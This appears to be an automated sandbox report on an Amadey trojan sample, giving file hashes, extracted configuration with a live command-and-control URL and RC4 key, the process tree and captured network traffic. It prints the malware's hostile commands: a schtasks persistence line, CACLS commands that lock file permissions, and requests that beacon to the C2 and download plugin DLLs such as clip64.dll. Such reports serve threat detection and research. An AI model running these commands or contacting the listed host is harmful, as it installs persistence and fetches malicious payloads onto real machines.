amadey | d8562f03bf114e18ad19e16b792346134c36c63394b8efc1ba67dde9fe33cd13 | Triage

Analysis

max time kernel
143s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
10/10/2023, 21:56 UTC

Sharing

Report Analysis Logs

General

Target

0b459792310ffbb162d73fa1b95e1e87.exe
Size

219KB
MD5

0b459792310ffbb162d73fa1b95e1e87
SHA1

e2fd97ac1e87ff3feb0d8f6de0596610ed911d30
SHA256

d8562f03bf114e18ad19e16b792346134c36c63394b8efc1ba67dde9fe33cd13
SHA512

e2778ee8d24d24bf1c01c83caacbe6af2090dedd25195c4c50eeec580add256d15247dadb07cfda553ece6af744e60558c0ae8e4ec87904023846921cbba77b1
SSDEEP

6144:DEPAc72ss5pKL93yMax7pH3F2d1ugMeSWp:DE32xpoaxBFg1ugMeS

Score

10^/10

amadey trojan

Malware Config

Extracted

Family

amadey

Version

3.89

C2

http://77.91.124.1/theme/index.php

Attributes

install_dir
fefffe8cea
install_file
explothe.exe
strings_key
36a96139c1118a354edf72b1080d4b2f

rc4.plain

1
006700e5a2ab05704bbb0c589b88924d

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	0b459792310ffbb162d73fa1b95e1e87.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	explothe.exe

Executes dropped EXE 2 IoCs

pid	Process
3740	explothe.exe
3996	explothe.exe

Loads dropped DLL 1 IoCs

pid	Process
332	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task/Job

pid	Process
3792	schtasks.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 3740	1612	0b459792310ffbb162d73fa1b95e1e87.exe	87
PID 1612 wrote to memory of 3740	1612	0b459792310ffbb162d73fa1b95e1e87.exe	87
PID 1612 wrote to memory of 3740	1612	0b459792310ffbb162d73fa1b95e1e87.exe	87
PID 3740 wrote to memory of 3792	3740	explothe.exe	88
PID 3740 wrote to memory of 3792	3740	explothe.exe	88
PID 3740 wrote to memory of 3792	3740	explothe.exe	88
PID 3740 wrote to memory of 4368	3740	explothe.exe	90
PID 3740 wrote to memory of 4368	3740	explothe.exe	90
PID 3740 wrote to memory of 4368	3740	explothe.exe	90
PID 4368 wrote to memory of 4928	4368	cmd.exe	92
PID 4368 wrote to memory of 4928	4368	cmd.exe	92
PID 4368 wrote to memory of 4928	4368	cmd.exe	92
PID 4368 wrote to memory of 3924	4368	cmd.exe	93
PID 4368 wrote to memory of 3924	4368	cmd.exe	93
PID 4368 wrote to memory of 3924	4368	cmd.exe	93
PID 4368 wrote to memory of 2768	4368	cmd.exe	94
PID 4368 wrote to memory of 2768	4368	cmd.exe	94
PID 4368 wrote to memory of 2768	4368	cmd.exe	94
PID 4368 wrote to memory of 1388	4368	cmd.exe	95
PID 4368 wrote to memory of 1388	4368	cmd.exe	95
PID 4368 wrote to memory of 1388	4368	cmd.exe	95
PID 4368 wrote to memory of 1532	4368	cmd.exe	96
PID 4368 wrote to memory of 1532	4368	cmd.exe	96
PID 4368 wrote to memory of 1532	4368	cmd.exe	96
PID 4368 wrote to memory of 4604	4368	cmd.exe	97
PID 4368 wrote to memory of 4604	4368	cmd.exe	97
PID 4368 wrote to memory of 4604	4368	cmd.exe	97
PID 3740 wrote to memory of 332	3740	explothe.exe	111
PID 3740 wrote to memory of 332	3740	explothe.exe	111
PID 3740 wrote to memory of 332	3740	explothe.exe	111

C:\Users\Admin\AppData\Local\Temp\0b459792310ffbb162d73fa1b95e1e87.exe
"C:\Users\Admin\AppData\Local\Temp\0b459792310ffbb162d73fa1b95e1e87.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3740
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3792
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:4928
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:2768
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:1388
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:4604
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:332

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:3996

Network

DNS

22.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.160.190.20.in-addr.arpa

IN PTR

Response
DNS

158.240.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.240.127.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 188125
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5AF2DB47D3D040C7A79926744EBF7583 Ref B: AMS04EDGE2606 Ref C: 2023-10-11T00:15:56Z
date: Wed, 11 Oct 2023 00:15:56 GMT
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 00:15:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR

Response
DNS

38.148.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

38.148.119.40.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 00:16:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 00:16:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

208.143.182.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.143.182.52.in-addr.arpa

IN PTR

Response

204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4

tls, http2

7.9kB
203.5kB
157
154

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

4.7kB
101.8kB
80
79

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200

8.8.8.8:53

22.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.160.190.20.in-addr.arpa
8.8.8.8:53

158.240.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

158.240.127.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

59.128.231.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

59.128.231.4.in-addr.arpa
8.8.8.8:53

38.148.119.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

38.148.119.40.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

208.143.182.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

208.143.182.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
219KB

MD5
0b459792310ffbb162d73fa1b95e1e87

SHA1
e2fd97ac1e87ff3feb0d8f6de0596610ed911d30

SHA256
d8562f03bf114e18ad19e16b792346134c36c63394b8efc1ba67dde9fe33cd13

SHA512
e2778ee8d24d24bf1c01c83caacbe6af2090dedd25195c4c50eeec580add256d15247dadb07cfda553ece6af744e60558c0ae8e4ec87904023846921cbba77b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
219KB

MD5
0b459792310ffbb162d73fa1b95e1e87

SHA1
e2fd97ac1e87ff3feb0d8f6de0596610ed911d30

SHA256
d8562f03bf114e18ad19e16b792346134c36c63394b8efc1ba67dde9fe33cd13

SHA512
e2778ee8d24d24bf1c01c83caacbe6af2090dedd25195c4c50eeec580add256d15247dadb07cfda553ece6af744e60558c0ae8e4ec87904023846921cbba77b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
219KB

MD5
0b459792310ffbb162d73fa1b95e1e87

SHA1
e2fd97ac1e87ff3feb0d8f6de0596610ed911d30

SHA256
d8562f03bf114e18ad19e16b792346134c36c63394b8efc1ba67dde9fe33cd13

SHA512
e2778ee8d24d24bf1c01c83caacbe6af2090dedd25195c4c50eeec580add256d15247dadb07cfda553ece6af744e60558c0ae8e4ec87904023846921cbba77b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
219KB

MD5
0b459792310ffbb162d73fa1b95e1e87

SHA1
e2fd97ac1e87ff3feb0d8f6de0596610ed911d30

SHA256
d8562f03bf114e18ad19e16b792346134c36c63394b8efc1ba67dde9fe33cd13

SHA512
e2778ee8d24d24bf1c01c83caacbe6af2090dedd25195c4c50eeec580add256d15247dadb07cfda553ece6af744e60558c0ae8e4ec87904023846921cbba77b1

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

Filesize
273B

MD5
a5b509a3fb95cc3c8d89cd39fc2a30fb

SHA1
5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c

SHA256
5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529

SHA512
3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

Download Submit